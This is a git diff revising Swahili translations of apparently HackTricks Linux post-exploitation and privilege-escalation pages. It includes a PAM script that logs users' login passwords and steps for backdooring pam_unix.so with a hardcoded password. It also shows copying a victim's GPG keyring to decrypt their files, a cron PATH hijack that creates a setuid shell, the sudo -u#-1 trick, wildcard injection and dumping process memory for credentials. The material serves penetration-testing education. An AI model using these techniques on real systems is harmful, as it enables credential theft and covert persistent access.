diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 2da4a351c..4e133979c 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -4,22 +4,23 @@ ## Sniffing Logon Passwords with PAM -Tuwekeze moduli ya PAM ili kurekodi kila nenosiri ambalo mtumiaji anatumia kuingia. Ikiwa hujui ni nini PAM angalia: +Wacha tuchague moduli ya PAM ili kurekodi kila password ambayo kila mtumiaji anaitumia kuingia. Ikiwa hujui PAM ni nini angalia: + {{#ref}} pam-pluggable-authentication-modules.md {{#endref}} -**Kwa maelezo zaidi angalia [post ya asili](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu: +**For further details check the [original post](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu: -**Muhtasari wa Mbinu:** -Pluggable Authentication Modules (PAM) hutoa kubadilika katika usimamizi wa uthibitishaji kwenye mifumo ya Unix. Wanaweza kuongeza usalama kwa kubadilisha michakato ya kuingia lakini pia wanaweza kuleta hatari ikiwa zitatumika vibaya. Muhtasari huu unaelezea mbinu ya kukamata taarifa za kuingia kwa kutumia PAM, pamoja na mikakati ya kupunguza hatari. +**Technique Overview:** +Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo ya Unix. Zinaboresha security kwa kuruhusu ubinafsishaji wa michakato ya login lakini pia zinaweza kuleta hatari endapo zitatumiwa vibaya. Muhtasari huu unaelezea technique ya kukamata login credentials kwa kutumia PAM, pamoja na mitigation strategies. -**Kukamata Taarifa:** +**Capturing Credentials:** -- Skripti ya bash inayoitwa `toomanysecrets.sh` imeandaliwa ili kurekodi majaribio ya kuingia, ikikamata tarehe, jina la mtumiaji (`$PAM_USER`), nenosiri (kupitia stdin), na IP ya mwenyeji wa mbali (`$PAM_RHOST`) kwenye `/var/log/toomanysecrets.log`. -- Skripti hiyo imefanywa kuwa executable na kuunganishwa kwenye usanidi wa PAM (`common-auth`) kwa kutumia moduli ya `pam_exec.so` yenye chaguzi za kufanya kazi kimya na kufichua tokeni ya uthibitishaji kwa skripti. -- Njia hii inaonyesha jinsi mwenyeji wa Linux aliyeathirika anavyoweza kutumika kukamata taarifa kwa siri. +- Script ya bash yenye jina `toomanysecrets.sh` imeandikwa ili kurekodi jaribio za login, ikichukua tarehe, jina la mtumiaji (`$PAM_USER`), password (kupitia stdin), na IP ya host ya mbali (`$PAM_RHOST`) katika `/var/log/toomanysecrets.log`. +- Script imefanywa executable na kuingizwa katika configuration ya PAM (`common-auth`) kwa kutumia module `pam_exec.so` na chaguzi za kuendesha kimya na kufikisha authentication token kwa script. +- Mbinu hii inaonyesha jinsi host ya Linux iliyovamiwa inaweza kutumika kurekodi credentials kwa utulivu. ```bash #!/bin/sh echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log @@ -31,23 +32,51 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh ``` ### Backdooring PAM -**Kwa maelezo zaidi angalia [post ya asili](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu: +**Kwa maelezo zaidi angalia [original post](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu: -Moduli ya Uthibitishaji Inayoweza Kuunganishwa (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa mtumiaji. Inafanya kazi kwa dhana tatu kuu: **jina la mtumiaji**, **nenosiri**, na **huduma**. Faili za usanidi kwa kila huduma ziko katika saraka ya `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji. +Pluggable Authentication Module (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa watumiaji. Inaendeshwa kwa misingi mitatu kuu: **username**, **password**, na **service**. Faili za usanidi kwa kila service ziko kwenye saraka `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji. -**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa nenosiri maalum, ukipita nenosiri halisi la mtumiaji. Hii inazingatia hasa maktaba ya pamoja `pam_unix.so` inayotumiwa na faili ya `common-auth`, ambayo inajumuishwa na huduma nyingi kwa uthibitishaji wa nenosiri. +**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa kutumia password maalum, ukiepuka password halisi ya mtumiaji. Hii inazingatia hasa maktaba ya pamoja `pam_unix.so` inayotumika na faili `common-auth`, ambayo imejumuishwa na karibu services zote kwa password verification. -### Hatua za Kubadilisha `pam_unix.so`: +### Steps for Modifying `pam_unix.so`: -1. **Pata Mwelekeo wa Uthibitishaji** katika faili ya `common-auth`: -- Mstari unaohusika na kuangalia nenosiri la mtumiaji unaita `pam_unix.so`. -2. **Badilisha Msimbo wa Chanzo**: -- Ongeza taarifa ya masharti katika faili la chanzo la `pam_unix_auth.c` inayoruhusu ufikiaji ikiwa nenosiri lililotengwa linatumika, vinginevyo, inaendelea na mchakato wa kawaida wa uthibitishaji. -3. **Recompile na Badilisha** maktaba iliyobadilishwa `pam_unix.so` katika saraka inayofaa. -4. **Kujaribu**: -- Ufikiaji unaruhusiwa katika huduma mbalimbali (kuingia, ssh, sudo, su, screensaver) kwa nenosiri lililotengwa, wakati michakato ya kawaida ya uthibitishaji inabaki bila kuathiriwa. +1. **Locate the Authentication Directive** in the `common-auth` file: +- Mstari unaowajibika kwa kuangalia password ya mtumiaji unaitisha `pam_unix.so`. +2. **Modify Source Code**: +- Ongeza tamko la upendeleo (conditional) kwenye faili la chanzo `pam_unix_auth.c` ambalo linampa ufikiaji ikiwa password iliyowekwa mapema imetumika, vinginevyo linaendelea na mchakato wa kawaida wa authentication. +3. **Recompile and Replace** the modified `pam_unix.so` library in the appropriate directory. +- Recompile na ubadilishe maktaba `pam_unix.so` iliyorekebishwa kwenye saraka husika. +4. **Testing**: +- Ufikiaji unatolewa kwa services mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia password iliyotangazwa kabla, wakati michakato ya kawaida ya authentication haidhuriwa. > [!TIP] -> Unaweza kujiandaa mchakato huu kwa [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) +> Unaweza kuendesha mchakato huu kwa kiotomatiki kwa kutumia [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) + +## Decrypting GPG loot via homedir relocation + +If you find an encrypted `.gpg` file and a user’s `~/.gnupg` folder (pubring, private-keys, trustdb) but you can’t decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home. + +Makosa ya kawaida utakayoyaona bila hili: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili). + +Workflow: +```bash +# 1) Stage a writable homedir and copy the victim's keyring +mkdir -p /dev/shm/fakehome/.gnupg +cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/ +# 2) Ensure ownership & perms are sane for gnupg +chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg +chmod 700 /dev/shm/fakehome/.gnupg +# 3) Decrypt using the relocated homedir (either flag works) +GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg +# or +gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg +``` +Ikiwa nyenzo za ufunguo wa siri zipo katika `private-keys-v1.d`, GPG itafungua na ku-decrypt bila kuuliza passphrase (au itauliza ikiwa ufunguo umewekwa ulinzi). + + +## Marejeo + +- [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) +- [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index d4aaa465b..85f9742a9 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -14,38 +14,38 @@ cat /etc/os-release 2>/dev/null # universal on modern systems ``` ### Path -Ikiwa una **write permissions kwenye folda yoyote ndani ya `PATH`** variable unaweza ku-hijack baadhi ya libraries au binaries: +Ikiwa una ruhusa za kuandika kwenye folda yoyote ndani ya kigezo cha `PATH`, huenda ukaweza hijack baadhi ya libraries au binaries: ```bash echo $PATH ``` ### Taarifa za mazingira -Je, kuna habari za kuvutia, nywila, au API keys katika vigezo vya mazingira? +Je, kuna taarifa zinazovutia, nywila, au API keys katika vigezo vya mazingira? ```bash (env || set) 2>/dev/null ``` ### Kernel exploits -Angalia toleo la kernel na kama kuna exploit inayoweza kutumiwa ku-escalate privileges +Angalia toleo la kernel na kama kuna exploit yoyote inayoweza kutumika ku-escalate privileges. ```bash cat /proc/version uname -a searchsploit "Linux Kernel" ``` -Unaweza kupata orodha nzuri ya kernel zilizo na udhaifu na baadhi za **compiled exploits** hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) na [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\ -Tovuti nyingine ambapo unaweza kupata baadhi za **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) +Unaweza kupata orodha nzuri ya kernel zilizo na udhaifu na baadhi ya **compiled exploits** hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) na [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\ +Tovuti nyingine ambapo unaweza kupata baadhi ya **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) -Ili kutoa toleo zote za kernel zilizo na udhaifu kutoka kwenye tovuti hiyo unaweza kufanya: +Ili kutoa matoleo yote ya kernel yenye udhaifu kutoka kwenye tovuti hiyo unaweza kufanya: ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` -Zana ambazo zinaweza kusaidia kutafuta kernel exploits ni: +Vifaa vinavyoweza kusaidia kutafuta kernel exploits ni: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ -[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (execute IN victim, inaangalia tu exploits kwa kernel 2.x) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (tekeleza kwenye victim, inakagua tu exploits za kernel 2.x) -Kila wakati **tafuta toleo la kernel kwenye Google**, labda toleo la kernel lako limeandikwa katika kernel exploit fulani na hapo utakuwa na uhakika kwamba exploit hiyo ni halali. +Kila wakati **tafuta toleo la kernel kwenye Google**, pengine toleo lako la kernel limeandikwa katika exploit fulani ya kernel na basi utahakikisha exploit hiyo ni halali. ### CVE-2016-5195 (DirtyCow) @@ -57,13 +57,13 @@ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` -### Toleo la Sudo +### Sudo toleo -Kulingana na matoleo ya Sudo yaliyo dhaifu yanayoonekana katika: +Kulingana na matoleo ya sudo yaliyo dhaifu yanayoonekana katika: ```bash searchsploit sudo ``` -Unaweza kukagua ikiwa toleo la sudo lina udhaifu kwa kutumia grep hii. +Unaweza kuangalia ikiwa toleo la sudo linaloweza kuathiriwa kwa kutumia grep hii. ```bash sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" ``` @@ -73,20 +73,20 @@ Kutoka kwa @sickrov ``` sudo -u#-1 /bin/bash ``` -### Dmesg uthibitishaji wa saini ulishindwa +### Dmesg signature verification failed -Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln hii ingeweza kutumiwa +Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln hii inaweza kutumiwa ```bash dmesg 2>/dev/null | grep "signature" ``` -### Zaidi ya utambuzi wa mfumo +### Zaidi kuhusu ukusanyaji wa taarifa za mfumo ```bash date 2>/dev/null #Date (df -h || lsblk) #System stats lscpu #CPU info lpstat -a 2>/dev/null #Printers info ``` -## Orodhesha ulinzi unaowezekana +## Taja ulinzi unaowezekana ### AppArmor ```bash @@ -121,10 +121,9 @@ fi cat /proc/sys/kernel/randomize_va_space 2>/dev/null #If 0, not enabled ``` -## Docker Breakout - -Ikiwa uko ndani ya docker container, unaweza kujaribu kutoroka kutoka kwake: +## Docker Kutoroka +Iwapo uko ndani ya docker container unaweza kujaribu kutoroka kutoka ndani yake: {{#ref}} docker-security/ @@ -132,7 +131,7 @@ docker-security/ ## Diski -Angalia **nini kime-mounted na kime-unmounted**, wapi na kwa nini. Ikiwa kitu chochote kime-unmounted, unaweza kujaribu kuki-mount na kuangalia taarifa binafsi +Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa kitu chochote ni unmounted unaweza kujaribu ku-mount na kukagua kwa taarifa binafsi. ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null @@ -145,56 +144,56 @@ Orodhesha binaries muhimu ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` -Pia, angalia ikiwa **any compiler is installed**. Hii ni muhimu ikiwa utahitaji kutumia baadhi ya kernel exploit, kwani inashauriwa ku-compile kwenye mashine utakayoitumia (au kwenye ile inayofanana). +Pia, angalia kama **compiler yoyote imewekwa**. Hii ni muhimu ikiwa unahitaji kutumia kernel exploit, kwani inashauriwa kucompile kwenye mashine utakayoitumia (au kwenye mashine inayofanana). ```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` -### Programu Zilizo Dhaifu Zimewekwa +### Programu Zenye Udhaifu Zimewekwa -Angalia **toleo la vifurushi na huduma zilizowekwa**. Labda kuna toleo la Nagios la zamani (kwa mfano) ambalo linaweza kutumiwa kupandisha ruhusa…\ -Inashauriwa kukagua kwa mkono toleo la programu zilizo na shaka zaidi zilizowekwa. +Kagua **toleo la paketi na huduma zilizosanikishwa**. Huenda kuna toleo la zamani la Nagios (kwa mfano) ambalo linaweza exploited kwa ajili ya escalating privileges…\ +Inashauriwa kukagua kwa mkono toleo la programu zilizosanikishwa zinazoshukiwa zaidi. ```bash dpkg -l #Debian rpm -qa #Centos ``` -Ikiwa una ufikiaji wa SSH kwenye mashine unaweza pia kutumia **openVAS** kukagua programu zilizozee na zilizo na udhaifu zilizowekwa ndani ya mashine. +Kama una ufikiaji wa SSH kwenye mashine, unaweza pia kutumia **openVAS** kukagua programu zilizowekwa ndani ya mashine kuona kama ni za zamani au zenye udhaifu. -> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa ujumla hazitakuwa na faida, kwa hivyo inashauriwa programu kama OpenVAS au zinazofanana nazo ambazo zitaangalia ikiwa toleo lolote la programu iliyowekwa lina hatari kwa exploits zinazojulikana_ +> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa kawaida hazitakuwa na manufaa, kwa hiyo inashauriwa kutumia programu kama OpenVAS au zinazofanana zitakazokagua kama toleo lolote la programu iliyosakinishwa linaweza kuwa hatarini kwa exploits zinazojulikana_ -## Processes +## Michakato -Angalia **ni michakato gani** inaendeshwa na ukague kama mchakato wowote una **ruhusa zaidi kuliko inavyopaswa** (labda tomcat inatekelezwa na root?) +Angalia **ni michakato gani** inayotekelezwa na angalia kama kuna mchakato wowote unao **mamlaka zaidi kuliko inavyostahili** (labda tomcat inatekelezwa na root?) ```bash ps aux ps -ef top -n 1 ``` -Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\ -Pia angalia privileges zako juu ya processes binaries, labda unaweza overwrite mwingine. +Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\ +Pia angalia ruhusa zako juu ya binaries za mchakato, huenda ukaweza kuandika juu ya binares za mtu mwingine. -### Process monitoring +### Ufuatiliaji wa michakato -Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia processes. Hii inaweza kuwa muhimu sana kubaini vulnerable processes zinazotekelezwa mara kwa mara au wakati seti ya vigezo inatimizwa. +Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa muhimu sana kutambua michakato yenye udhaifu inayotekelezwa mara kwa mara au wakati seti ya masharti yanatimizwa. -### Process memory +### Kumbukumbu za mchakato -Huduma fulani za server zinaokoa **credentials in clear text inside the memory**.\ -Kawaida utahitaji **root privileges** kusoma memory ya processes zinazomilikiwa na watumiaji wengine, kwa hivyo hii kawaida inakuwa muhimu zaidi ukiwa tayari root na unataka kugundua credentials zaidi.\ -Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma memory ya processes unazomiliki**. +Baadhi ya huduma za server huhifadhi **credentials kwa maandishi wazi ndani ya memory**.\ +Kawaida utahitaji **root privileges** kusoma memory ya michakato inayomilikiwa na watumiaji wengine, hivyo kwa kawaida hii ni ya maana zaidi ukiwa tayari root na unataka kugundua credentials zaidi.\ +Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma memory ya michakato unayomiliki**. > [!WARNING] -> Tambua kwamba siku hizi mashine nyingi **don't allow ptrace by default** ambayo ina maana huwezi dump processes nyingine zinazomilikiwa na unprivileged user wako. +> Kumbuka kwamba sasa hivi mashine nyingi **haziruhusu ptrace kwa chaguo-msingi** jambo ambalo linamaanisha huwezi kudump michakato mingine inayomilikiwa na mtumiaji wako asiye na ruhusa za juu. > -> The file _**/proc/sys/kernel/yama/ptrace_scope**_ controls the accessibility of ptrace: +> Faili _**/proc/sys/kernel/yama/ptrace_scope**_ inasimamia upatikanaji wa ptrace: > -> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. Hii ni njia ya jadi jinsi ptracing ilivyofanya kazi. -> - **kernel.yama.ptrace_scope = 1**: only a parent process can be debugged. -> - **kernel.yama.ptrace_scope = 2**: Only admin can use ptrace, as it required CAP_SYS_PTRACE capability. -> - **kernel.yama.ptrace_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again. +> - **kernel.yama.ptrace_scope = 0**: michakato yote inaweza ku-debugged, mradi tu zina uid sawa. Hii ndio njia ya kawaida jinsi ptracing ilivyofanya kazi. +> - **kernel.yama.ptrace_scope = 1**: mchakato mzazi pekee ndiye anaweza ku-debugged. +> - **kernel.yama.ptrace_scope = 2**: Ni admin pekee anaweza kutumia ptrace, kwa sababu inahitaji uwezo wa CAP_SYS_PTRACE. +> - **kernel.yama.ptrace_scope = 3**: Hakuna mchakato unaoweza kufuatiliwa kwa ptrace. Mara inapowekwa, inahitaji kuanzisha upya ili kuwezesha ptracing tena. #### GDB -Kama una access kwenye memory ya huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani yake credentials. +Ikiwa una ufikiaji wa memory ya huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani yake credentials. ```bash gdb -p (gdb) info proc mappings @@ -203,7 +202,7 @@ gdb -p (gdb) q strings /tmp/mem_ftp #User and password ``` -#### GDB Script +#### Skripti ya GDB ```bash:dump-memory.sh #!/bin/bash #./dump-memory.sh @@ -216,7 +215,7 @@ done ``` #### /proc/$pid/maps & /proc/$pid/mem -Kwa ID ya mchakato fulani, **maps inaonyesha jinsi kumbukumbu imepangwa ndani ya nafasi ya anwani pepe ya mchakato huo**; pia inaonyesha **idhinishaji za kila eneo lililopangwa**. Faili peudo ya **mem** **inafunua kumbukumbu za mchakato yenyewe**. Kutoka kwa faili ya **maps** tunajua ni **mikoa ya kumbukumbu inayoweza kusomwa** na offsets zao. Tunatumia taarifa hii **kutafuta ndani ya faili ya mem na dump mikoa yote inayoweza kusomwa** kwenye faili. +Kwa ID ya mchakato iliyotolewa, **maps yanaonyesha jinsi kumbukumbu imepangwa ndani ya mchakato huo** katika nafasi ya anwani pepe; pia inaonyesha **ruhusa za kila eneo lililopangwa**. Fayili bandia ya **mem** **inafunua kumbukumbu ya mchakato yenyewe**. Kutoka kwenye fayili ya **maps** tunajua ni **eneo za kumbukumbu yanayosomwa** na ofseti zao. Tunatumia taarifa hizi kufanya **seek into the mem file and dump all readable regions** kwa faili. ```bash procdump() ( @@ -231,14 +230,14 @@ rm $1*.bin ``` #### /dev/mem -`/dev/mem` hutoa ufikiaji kwa kumbukumbu za mfumo za **kimwili**, si kumbukumbu za pepe. Eneo la anwani pepe la kernel linaweza kufikiwa kwa kutumia /dev/kmem.\ -Kwa kawaida, `/dev/mem` inasomwa tu na **root** na kundi **kmem**. +`/dev/mem` inatoa ufikiaji kwa mfumo wa **kumbukumbu ya kimwili**, sio kumbukumbu ya virtual. Nafasi ya anwani ya virtual ya kernel inaweza kupatikana kwa kutumia /dev/kmem.\ +Kwa kawaida, `/dev/mem` inaweza kusomwa tu na **root** na kundi la **kmem**. ``` strings /dev/mem -n10 | grep -i PASS ``` -### ProcDump kwa linux +### ProcDump for linux -ProcDump ni utekelezaji wa Linux uliobuniwa upya wa zana ya klasiki ProcDump kutoka kwenye suite ya Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) +ProcDump ni toleo la Linux la zana maarufu ProcDump kutoka kwenye kifurushi cha Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) ``` procdump -p 1714 @@ -267,40 +266,40 @@ Press Ctrl-C to end monitoring without terminating the process. ``` ### Zana -Ili ku-dump kumbukumbu za mchakato unaweza kutumia: +Ili dump a process memory unaweza kutumia: - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) -- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kuondoa kwa mkono mahitaji ya root na ku-dump mchakato unaomilikiwa na wewe -- Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root inahitajika) +- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kwa mikono kuondoa mahitaji ya root na dump process inayomilikiwa na wewe +- Script A.5 kutoka [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root inahitajika) -### Sifa za kuingia kutoka kwenye Kumbukumbu za Mchakato +### Taarifa za kuingia kutoka Process Memory -#### Mfano wa kufanya kwa mkono +#### Mfano la mkono -Ikiwa utagundua kwamba mchakato wa authenticator unaendesha: +Ikiwa utagundua kwamba authenticator process inaendesha: ```bash ps -ef | grep "authenticator" root 2027 2025 0 11:46 ? 00:00:00 authenticator ``` -Unaweza dump mchakato (angalia sehemu zilizopita ili kupata njia tofauti za dump kumbukumbu za mchakato) na kutafuta credentials ndani ya kumbukumbu: +Unaweza dump the process (angalia sehemu zilizotangulia ili kupata njia tofauti za ku-dump memory ya process) na kutafuta credentials ndani ya memory: ```bash ./dump-memory.sh 2027 strings *.dump | grep -i password ``` #### mimipenguin -Chombo [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) kitapora nyaraka za kuingia kwa maandishi wazi kutoka kwenye kumbukumbu na kutoka kwa baadhi ya faili zinazojulikana. Kinahitaji vibali vya root ili kifanye kazi ipasavyo. +Zana [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) ita **steal clear text credentials from memory** na kutoka kwa baadhi ya **mafayela yanayojulikana vizuri**. Inahitaji root privileges ili ifanye kazi ipasavyo. | Kipengele | Jina la Mchakato | | ------------------------------------------------- | -------------------- | -| Nywila ya GDM (Kali Desktop, Debian Desktop) | gdm-password | +| GDM password (Kali Desktop, Debian Desktop) | gdm-password | | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon | | LightDM (Ubuntu Desktop) | lightdm | -| VSFTPd (Uunganisho za FTP zinazoendelea) | vsftpd | -| Apache2 (Vikao vya uthibitisho wa msingi wa HTTP vinavyofanya kazi) | apache2 | -| OpenSSH (Vikao vya SSH vinavyofanya kazi - Matumizi ya sudo) | sshd: | +| VSFTPd (Active FTP Connections) | vsftpd | +| Apache2 (Active HTTP Basic Auth Sessions) | apache2 | +| OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: | -#### Regexes za Utafutaji/[truffleproc](https://github.com/controlplaneio/truffleproc) +#### Tafuta Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc) ```bash # un truffleproc.sh against your current Bash shell (e.g. $$) ./truffleproc.sh $$ @@ -314,9 +313,9 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1... # finding secrets # results in /tmp/tmp.o6HV0Pl3fe/results.txt ``` -## Scheduled/Cron jobs +## Kazi zilizopangwa/Cron -Angalia kama kazi yoyote iliyopangwa ina udhaifu. Labda unaweza kunufaika na script inayotekelezwa na root (wildcard vuln? unaweza kubadilisha faili ambazo root hutumia? tumia symlinks? unda faili maalum katika directory ambayo root hutumia?). +Angalia kama kazi yoyote iliyopangwa ina udhaifu. Labda unaweza kunufaika na script inayotekelezwa na root (wildcard vuln? unaweza kubadilisha files ambazo root anazitumia? tumia symlinks? unda files maalum katika directory ambayo root anaitumia?). ```bash crontab -l ls -al /etc/cron* /etc/at* @@ -324,26 +323,26 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul ``` ### Cron path -Kwa mfano, ndani ya _/etc/crontab_ utaona PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ +Kwa mfano, ndani ya _/etc/crontab_ unaweza kupata PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ -(_Angalia jinsi mtumiaji "user" ana ruhusa za kuandika kwenye /home/user_) +(_Angalia jinsi mtumiaji "user" ana ruhusa za kuandika juu ya /home/user_) -Iwapo ndani ya crontab hii mtumiaji root atajaribu kutekeleza amri au script bila kuweka PATH. Kwa mfano: _\* \* \* \* root overwrite.sh_\ +Ikiwa ndani ya crontab hii mtumiaji root anajaribu kutekeleza amri au script bila kuweka PATH. Kwa mfano: _\* \* \* \* root overwrite.sh_\ Basi, unaweza kupata shell ya root kwa kutumia: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh #Wait cron job to be executed /tmp/bash -p #The effective uid and gid to be set to the real uid and gid ``` -### Cron ikitumia script yenye wildcard (Wildcard Injection) +### Cron using a script with a wildcard (Wildcard Injection) -Ikiwa script inatekelezwa na root na ina “**\***” ndani ya amri, unaweza kuitumia exploit kufanya mambo yasiyotarajiwa (kama privesc). Mfano: +Ikiwa script inayotekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia kusababisha matokeo yasiyotegemewa (kama privesc). Mfano: ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` -**Ikiwa wildcard inatanguliwa na njia kama** _**/some/path/\***_**, haina udhaifu (hata** _**./\***_ **haina).** +**Ikiwa wildcard imefuatiwa na path kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **sio).** -Soma ukurasa ufuatao kwa mbinu zaidi za kutumia wildcard: +Read the following page for more wildcard exploitation tricks: {{#ref}} @@ -351,13 +350,13 @@ wildcards-spare-tricks.md {{#endref}} -### Bash: Injection ya upanuzi wa hisabati katika parsers za log za cron +### Bash arithmetic expansion injection in cron log parsers -Bash hufanya parameter expansion na command substitution kabla ya tathmini ya hisabati katika ((...)), $((...)) na let. Ikiwa cron/parser ya root inasoma sehemu za log zisizotegemewa na kuzipeleka katika muktadha wa hisabati, mshambuliaji anaweza kuingiza command substitution $(...) inayotekelezwa kama root wakati cron inavyoenda. +Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. Ikiwa root cron/parser inasoma untrusted log fields na kuziingiza ndani ya 